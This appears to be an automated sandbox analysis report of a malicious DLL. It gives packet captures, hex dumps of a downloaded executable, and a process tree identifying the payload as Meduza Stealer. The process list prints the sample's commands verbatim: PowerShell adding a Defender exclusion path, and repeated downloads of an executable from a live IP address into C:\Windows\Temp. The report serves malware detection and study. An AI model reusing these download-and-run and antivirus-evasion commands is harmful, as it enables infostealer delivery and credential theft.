Dec 19, 2024 08:52:37.079766035 CET	1236	IN	Data Raw: e0 00 00 00 48 8d 8d e8 0a 00 00 e8 de 5e 04 00 90 c7 85 08 0b 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 80 04 00 00 48 b8 41 e3 17 62 7b 60 bd b4 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 88 04 00 00 48 b8 25 Data Ascii: H^L@H@HHAb{`H@H@HH%95L~H@H@HL@H@HH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8foWD$ ffoWL$0f
Dec 19, 2024 08:52:37.080456018 CET	1236	IN	Data Raw: 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 20 01 00 00 0f 57 44 24 20 66 0f 7f 85 20 01 00 00 0f 57 c0 0f 11 85 c0 0b 00 00 0f 57 c9 f3 0f 7f 8d d0 0b 00 00 48 8d 85 20 01 00 00 4c 8b c3 0f 1f 40 00 49 ff c0 42 80 3c 00 00 Data Ascii: @H@HD$(fo WD$ f WWH L@IB<uH HYHezH@H@HI"MDL@H@HH;=&H@H@HH[U5H@H@HH@
Dec 19, 2024 08:52:37.080476046 CET	1236	IN	Data Raw: 14 00 00 48 89 85 18 05 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 4c 89 a5 40 14 Data Ascii: HH@H@HD$ H@H@HD$(HI\AL~H@H@HD$0L@H@HD$8foWD$ ffoWL$0fWxLLHLIB<uHHx}TL@H@HPI!H'L@H
Dec 19, 2024 08:52:37.081206083 CET	1236	IN	Data Raw: 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 70 01 00 00 0f 57 44 24 20 66 0f 7f 85 70 01 00 00 0f 57 c0 0f 11 85 28 0d 00 00 4c 89 b5 38 0d 00 00 4c 89 b5 40 0d 00 00 48 8d 85 70 01 00 00 4c 8b c3 90 Data Ascii: HD$ H@H@HD$(fopWD$ fpW(L8L@HpLIB<uHpH(PHL@H@H`H/0I{tH@H@HhH/5&L~H@H@HpL@H@HxH@H@HD
Dec 19, 2024 08:52:37.197917938 CET	1236	IN	Data Raw: 00 0f 57 c0 0f 11 85 00 0e 00 00 0f 57 c9 f3 0f 7f 8d 10 0e 00 00 48 8d 85 c0 01 00 00 4c 8b c3 49 ff c0 42 80 3c 00 00 75 f6 48 8d 95 c0 01 00 00 48 8d 8d 00 0e 00 00 e8 61 4b 04 00 90 c7 85 20 0e 00 00 02 00 00 00 49 bf c6 5e 56 e3 87 98 dc f5 Data Ascii: WWHLIB<uHHaK I^VL@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fW(L8L@HLDIB<uHH(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49734	147.45.47.15	80	8060	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:52:35.970940113 CET	168	OUT	GET /duschno.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.47.15 Connection: Keep-Alive
Dec 19, 2024 08:52:37.224733114 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:52:37 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT ETag: "13ba00-628dc35e76e87" Accept-Ranges: bytes Content-Length: 1292800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data\|Z@.pdataln<@@.rsrc@@.reloc<@B
Dec 19, 2024 08:52:37.224942923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H\$Ht$H\|$ UATAUAVAWH$H+H~\|H@H@HH/*OHzH@H@HH>=-)H@H@H
Dec 19, 2024 08:52:37.224948883 CET	1236	IN	Data Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3 Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
Dec 19, 2024 08:52:37.225814104 CET	1236	IN	Data Raw: c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 10 48 8d 8d 88 08 00 00 e8 46 6d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 28 48 89 b5 40 14 00 00 48 8b Data Ascii: fIB<uHUHFmL@H@HE H@H@HE(H@H@HD$ H@H@HD$(foE WD$ fE WLLHE LIB<uHU HlHhaH@H@HE0H@H@HE8H
Dec 19, 2024 08:52:37.225820065 CET	1236	IN	Data Raw: 00 48 89 44 24 48 48 b8 fd 98 41 20 d0 d3 e5 a6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 50 48 89 8d 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 58 66 0f 6f 85 80 06 00 00 0f 57 44 24 20 66 0f 7f 85 80 06 00 00 66 0f 6f 8d 90 06 00 Data Ascii: HD$HHA H@H@HD$PH@H@HD$XfoWD$ ffoWL$0ffoWD$@ffoWL$PfW`WpHLIB<uHH`gHpmH@H@HEpH7X'H@
Dec 19, 2024 08:52:37.226660013 CET	1236	IN	Data Raw: 58 54 63 b3 aa 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 48 04 00 00 48 b8 2c 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 50 04 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 58 04 00 00 48 89 b5 40 Data Ascii: XTcH@H@HHH,\AL~H@H@HPL@H@HXH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPW8LHLPH@LIB<uH
Dec 19, 2024 08:52:37.226667881 CET	1236	IN	Data Raw: e0 00 00 00 48 8d 8d e8 0a 00 00 e8 de 5e 04 00 90 c7 85 08 0b 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 80 04 00 00 48 b8 41 e3 17 62 7b 60 bd b4 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 88 04 00 00 48 b8 25 Data Ascii: H^L@H@HHAb{`H@H@HH%95L~H@H@HL@H@HH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8foWD$ ffoWL$0f
Dec 19, 2024 08:52:37.227180004 CET	1000	IN	Data Raw: 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 20 01 00 00 0f 57 44 24 20 66 0f 7f 85 20 01 00 00 0f 57 c0 0f 11 85 c0 0b 00 00 0f 57 c9 f3 0f 7f 8d d0 0b 00 00 48 8d 85 20 01 00 00 4c 8b c3 0f 1f 40 00 49 ff c0 42 80 3c 00 00 Data Ascii: @H@HD$(fo WD$ f WWH L@IB<uH HYHezH@H@HI"MDL@H@HH;=&H@H@HH[U5H@H@HH@
Dec 19, 2024 08:52:37.227188110 CET	1236	IN	Data Raw: 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 40 01 00 00 0f 57 44 24 20 66 0f 7f 85 40 01 00 00 0f 57 c0 0f 11 85 50 0c 00 00 0f 57 c9 f3 0f 7f 8d 60 0c 00 00 48 8d 85 40 01 00 00 4c 8b c3 0f 1f 40 00 Data Ascii: HD$ H@H@HD$(fo@WD$ f@WPW`H@L@IB<uH@HPUpIpyL@H@HI!H{TL@H@HH,25H@H@HH[M5H@H@H
Dec 19, 2024 08:52:37.227932930 CET	1236	IN	Data Raw: 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 38 66 0f 6f 85 40 05 00 00 0f 57 44 24 20 66 0f 7f 85 40 Data Ascii: @H@HD$(HI\AL~H@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPWLL H@LfIB<uH@HPL@H@HpI/0I'L@H@HxH@H@HD$
Dec 19, 2024 08:52:37.344568014 CET	1236	IN	Data Raw: 14 00 00 48 89 85 b8 01 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 b0 01 00 00 0f 57 44 24 20 66 0f 7f 85 b0 01 00 00 0f 57 c0 0f 11 85 e0 0d 00 00 0f 57 c9 Data Ascii: HH@H@HD$ H@H@HD$(foWD$ fWWHLfDIB<uHHLL@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fW

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	104.26.12.205	443	6796	C:\Windows\Temp\t0ppkxxj.rwu.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:52:41 UTC	100	OUT	GET / HTTP/1.1 Accept: text/html; text/plain; / Host: api.ipify.org Cache-Control: no-cache
2024-12-19 07:52:41 UTC	424	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:52:41 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8f45d08c6a4142a6-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1560&rtt_var=667&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=738&delivery_rate=1544156&cwnd=215&unsent_bytes=0&cid=68b380669f07172a&ts=447&x=0"
2024-12-19 07:52:41 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Target ID:	0
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\iviewers.dll"
Imagebase:	0x650000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll
Imagebase:	0x9e0000
File size:	20'992 bytes
MD5 hash:	878E47C8656E53AE8A8A21E927C6F7E0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:52:17
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1
Imagebase:	0x2a0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 2504, Parent PID: 6036

General

Target ID:	9
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 2476, Parent PID: 6584

General

Target ID:	10
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:52:18
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:52:21
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7544, Parent PID: 7536

General

Target ID:	13
Start time:	02:52:21
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:52:23
Start date:	19/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:52:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\inyligbs.qlq.exe'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:52:32
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:52:32
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\5mg21dmq.1jt.exe'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:52:32
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	02:52:33
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ochicikt.z2z.exe'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:52:33
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	02:52:33
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\t0ppkxxj.rwu.exe'"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:52:33
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:52:39
Start date:	19/12/2024
Path:	C:\Windows\Temp\t0ppkxxj.rwu.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Temp\t0ppkxxj.rwu.exe"
Imagebase:	0x7ff621810000
File size:	1'292'800 bytes
MD5 hash:	C6813DA66EBA357D0DEAA48C2F7032B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\t0ppkxxj.rwu.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	02:52:39
Start date:	19/12/2024
Path:	C:\Windows\Temp\ochicikt.z2z.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Temp\ochicikt.z2z.exe"
Imagebase:	0x7ff741a40000
File size:	1'292'800 bytes
MD5 hash:	C6813DA66EBA357D0DEAA48C2F7032B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 0000001B.00000002.1919727858.0000023773BFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\ochicikt.z2z.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:52:43
Start date:	19/12/2024
Path:	C:\Windows\Temp\inyligbs.qlq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Temp\inyligbs.qlq.exe"
Imagebase:	0x7ff7cee60000
File size:	1'292'800 bytes
MD5 hash:	C6813DA66EBA357D0DEAA48C2F7032B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 0000001C.00000002.1958069772.000001C3CD9C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\inyligbs.qlq.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:52:44
Start date:	19/12/2024
Path:	C:\Windows\Temp\5mg21dmq.1jt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Temp\5mg21dmq.1jt.exe"
Imagebase:	0x7ff786a20000
File size:	1'292'800 bytes
MD5 hash:	C6813DA66EBA357D0DEAA48C2F7032B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 0000001D.00000002.1965863333.000002BDB06EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\5mg21dmq.1jt.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Function 01870549 Relevance: .4, Instructions: 394COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912836543.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83220d30309f9c2bb4071eb0aaa6c4399e8272d60c378300ab2dab131e3ef1bb
Instruction ID: 2e0730ec8bb41924ab328ac37a840b1540651c43f5ef8e073da19833f73e55ae
Opcode Fuzzy Hash: 83220d30309f9c2bb4071eb0aaa6c4399e8272d60c378300ab2dab131e3ef1bb
Instruction Fuzzy Hash: C6E0EC1450D3C58FE3631BBC6E281287FB88E9B200B5945EBE4CACA5D799249605C7A3

Function 01870991 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912836543.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1870000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c9fd07c20fd43f13c46202c91696139525d6a51f46b5dfe36dbc3542b09aef
Instruction ID: 134ae6ff5e9fb8678a5c0aa918c69af1566474c916762ab5a893e181d2e085a4
Opcode Fuzzy Hash: 56c9fd07c20fd43f13c46202c91696139525d6a51f46b5dfe36dbc3542b09aef
Instruction Fuzzy Hash: BD31E6B07102098FDB14E7B8D9587AE7AA7EBC9300F104558E105E7394CF7A9D82D792

Function 017ED01C Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1912634208.00000000017ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 017ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17ed000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
